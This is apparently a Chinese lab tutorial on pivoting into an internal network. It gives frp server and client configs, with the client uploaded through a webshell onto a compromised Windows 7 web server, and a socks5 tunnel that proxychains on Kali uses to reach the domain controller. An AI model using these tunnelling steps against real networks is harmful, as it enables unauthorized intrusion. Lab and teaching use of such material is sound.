内网渗透--frp代理设置与proxychains代理设置
frp
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
项目地址:https://gitcode.com/gh_mirrors/fr/frp
免费下载资源
·
标题内网渗透–frp代理设置与proxychains代理设置
内网服务器 | 内网IP地址 | 外网IP地址 |
---|---|---|
内网web服务器(windows 7) | 192.168.52.143 | 192.168.213.138 |
内网域控服务器 | 192.168.52.138 |
外网服务器 | 外网IP地址 | 外网V8网卡 |
---|---|---|
外网kali | 192.168.213.132 | |
外网windows攻击机 | 192.168.0.137 | 192.168.213.1 |
frps服务端配置
修改外网windows11主机上的frps.ini文件为:
[common]
bind_port = 7000 # 外网监听端口
启动监听:
./frps -c ./frps.ini
frpc客户端配置
将经过修改的windows版本的frp通过蚁剑终端上传到wen服务器上
[common]
server_addr = 192.168.0.137 # 外网windows地址
server_port = 7000 # 外网监听端口
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
[socks5] # socks5代理设置,kali使用该代理加入战斗
type = tcp
plugin = socks5
remote_port = 5000
frp连接建立
客户端主动启动链接
frpc.exe -c frpc.ini
服务端的外网window11连接成功
kali socks 代理连接
由于刚刚在frpc客户端配置文件中写入了socks5代理,此时我们可以使用kali中的proxychains,设置socks5代理加入网络中
只需修改 /etc/proxychains4.conf 文件的最后一行就可以了
socks5 192.168.213.1 5000 # 192.168.213.1是外网win11的v8网卡地址
这样,我们就可以通过kali和自己的win11主机发动对内网的攻击了
GitHub 加速计划 / fr / frp
83.05 K
13 K
下载
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
最近提交(Master分支:3 个月前 )
4383756f
13 天前
6ba849fc
21 天前
更多推荐
已为社区贡献2条内容
所有评论(0)